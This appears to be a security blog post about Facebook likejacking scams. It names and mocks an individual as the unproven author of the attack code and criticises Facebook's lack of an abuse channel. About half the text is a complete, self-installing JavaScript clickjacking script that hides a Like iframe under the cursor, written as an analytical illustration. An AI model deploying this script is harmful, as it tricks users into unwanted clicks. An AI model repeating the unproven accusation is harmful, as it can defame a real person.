Recently I got an email from one of my readers - he analyzed the actual code used in an attack, did some googling around for snippets of it and found the person who is (supposedly, we have no proof yet) the author of the code behind the recent attacks. Meet bhav - and tremble before his mighty coder skills!
Meanwhile, bhav is into reverse engineering and learns about JS packers:
|Help understanding symbols|
Let's recap. We have a guy who wants to hide an iframe, messes with some site link-sharing code and learns about timeouts used to change the DOM. Nothing too suspicious, right? But what about this:
|Google Chrome redirect|
the share.php iframe and the use of the lpcAutoLike() function? You're being naughty, bhav!
The icing on the cake is that he's launching a fan page:
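The mechanics the recap describes, as an added illustration written for this post (generic example code, not bhav's script and not anything taken from the scam pages): a transparent iframe loads the Like button and a timer keeps repositioning it under the victim's cursor, so whatever they think they are clicking on, the click lands on Like. The button geometry inside the frame and the plugin URL are assumed placeholders, not values measured from Facebook.

```javascript
// Added example of hidden-iframe clickjacking as described in the recap above.
// Not the scam's real code; geometry and URL below are assumptions.

// Where the Like button sits *inside* the framed page (assumed values).
const LIKE_BUTTON = { x: 10, y: 8, width: 50, height: 20 };
// Assumed placeholder for the framed Like/share plugin URL.
const LIKE_PLUGIN_URL = 'https://www.facebook.com/plugins/like.php?href=http://example.com/';

// Pure helper: where must the iframe's top-left corner go so that the centre of
// the framed Like button sits exactly under the victim's cursor at (cx, cy)?
function iframeOffsetForCursor(cx, cy, button = LIKE_BUTTON) {
  return {
    left: Math.round(cx - button.x - button.width / 2),
    top: Math.round(cy - button.y - button.height / 2),
  };
}

// Build the hidden iframe. opacity:0 keeps it invisible but still clickable, and
// the huge z-index puts it above the decoy content the victim believes they
// are clicking on.
function buildHiddenFrame(doc, likeUrl) {
  const frame = doc.createElement('iframe');
  frame.src = likeUrl;
  frame.setAttribute('scrolling', 'no');
  frame.setAttribute('frameborder', '0');
  Object.assign(frame.style, {
    position: 'absolute',
    width: '100px',
    height: '40px',
    opacity: '0',
    zIndex: '2147483647',
  });
  return frame;
}

// Wire it up: track the cursor and move the frame on a short timer, so the
// invisible button is always under the pointer when the victim finally clicks.
// This is the "timeout used to change the DOM" pattern from the recap.
function installClickjack(doc, win, likeUrl, intervalMs = 20) {
  const frame = buildHiddenFrame(doc, likeUrl);
  doc.body.appendChild(frame);
  let cursor = { x: 0, y: 0 };
  doc.addEventListener('mousemove', (e) => {
    cursor = { x: e.pageX, y: e.pageY };
  });
  const tick = () => {
    const { left, top } = iframeOffsetForCursor(cursor.x, cursor.y);
    frame.style.left = `${left}px`;
    frame.style.top = `${top}px`;
    win.setTimeout(tick, intervalMs);
  };
  tick();
  return frame;
}

// Only touch the DOM when running in a browser; the helpers above are plain
// functions and can be exercised outside one.
if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  installClickjack(document, window, LIKE_PLUGIN_URL);
}
```

Nothing in the victim's browser distinguishes this click from a genuine one, which is why browser vendors treat it as a design property of frames rather than a bug; the only party that can refuse the setup is the framed page itself, by declining to be framed (X-Frame-Options or frame-busting script), or the user, by blocking the script as NoScript does.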
|Facebook fan page|
- browser vendors - they will probably not "fix" clickjacking, as it is not a bug but a flaw in the web itself
- Facebook users - who have no easy way to protect themselves apart from NoScript
- appsec guys - sure, I can spend a day analyzing Facebook scams like I did before, but it's the same every time and no fun either
- Facebook - reporting this to Facebook doesn't do any good; there isn't even an abuse@ address, and I found no way to report this after spending 15 minutes in their UI, so I gave up. The most a user can do is mark an individual scam URL as "spam", but new sites with the same code are being launched daily. Facebook, please make a policy on how to report these...
It's just not right and I have no idea how to make it better apart from publishing these posts.
P.S. On the up-side, I've just found some nice info about the other guy I've reported recently:
koto@xps:~$ whois -------------.info | grep -i '\(email\|server\)' | head -n 5
Registrant Email:------------email@example.com
Admin Email:------------firstname.lastname@example.org
Billing Email:------------email@example.com
Tech Email:------------firstname.lastname@example.org
Name Server:NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM